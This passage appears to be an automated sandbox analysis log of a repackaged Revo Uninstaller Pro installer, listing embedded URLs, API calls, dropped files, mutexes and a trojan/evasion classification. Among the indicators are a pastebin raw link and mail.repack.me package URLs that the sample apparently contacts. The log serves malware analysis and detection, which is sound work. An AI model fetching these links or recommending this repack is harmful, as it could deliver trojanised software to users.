      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/https://autoupdate.opera.com/me/OperaDesktophttps://crashstats-coll
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://autoupdate.opera.com/me/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashpad.chromium.org/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashpad.chromium.org/bug/new
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashstats-collector-2.opera.com/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io)
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io/en/education.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io/en/get.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://help.instagram.com/581066165581870;
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://help.opera.com/latest/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/eula/computers
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/privacy
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/privacy.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/terms
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/terms.
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/rosoft
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B260000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159782360.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgW
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgZ
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgo
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/y
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://opera.com/privacy
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159925120.000000000B245000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191694426.000000000B245000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362624154.000000000B245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9B
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159455427.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9B.
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9BHI
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bd
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bget8191
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bs
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159553605.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bt
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159455427.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9By2
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://policies.google.com/terms;
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://redir.opera.com/uninstallsurvey/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repack.me/ad.html
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://sourcecode.opera.com
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://telegram.org/tos/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://twitter.com/en/tos;
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com..
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com/download/
Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.opera.com/privacy
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.revouninstaller.com/contact-us/C:
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/up
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLast
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Software
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstaller.com/support/
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstaller.com/updatepro5.xmlhttps://www.revouninstaller.com/downloads-manager/?fil
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/.ruelDelete
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/Uninstaller
Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.whatsapp.com/legal;
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_00FD6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Code function: 26_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
Source: C:\Windows\System32\rundll32.exe File created: C:\Windows\system32\DRIVERS\SETB88F.tmp
Source: C:\Windows\System32\rundll32.exe File deleted: C:\Windows\System32\drivers\SETB88F.tmp
Source: Joe Sandbox View Dropped File: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: String function: 00FED940 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: String function: 00FED870 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: String function: 00FEE2F0 appears 31 times
Source: setup.exe.27.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: setup.exe.28.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: ruplp.exe.0.dr Static PE information: Number of sections : 11 > 10
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameinetc.dllF vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRevoUnPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerevoflt.sysJ vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRUExt.dll^ vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRevoUPPort.exe@ vs Revo.Uninstaller.Pro.v5.3.4.exe
Source: Revo.Uninstaller.Pro.v5.3.4.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal44.troj.evad.winEXE@44/128@9/7
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_00FD6D06 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_004021CF CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_00FE963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File created: C:\Program Files\VS Revo Group
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File created: C:\Users\user\Desktop\Revo Uninstaller Pro.lnk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Opera/Installer/C:/Users/user/AppData/Local/Programs/Opera
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\RevoUninstallerPro}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
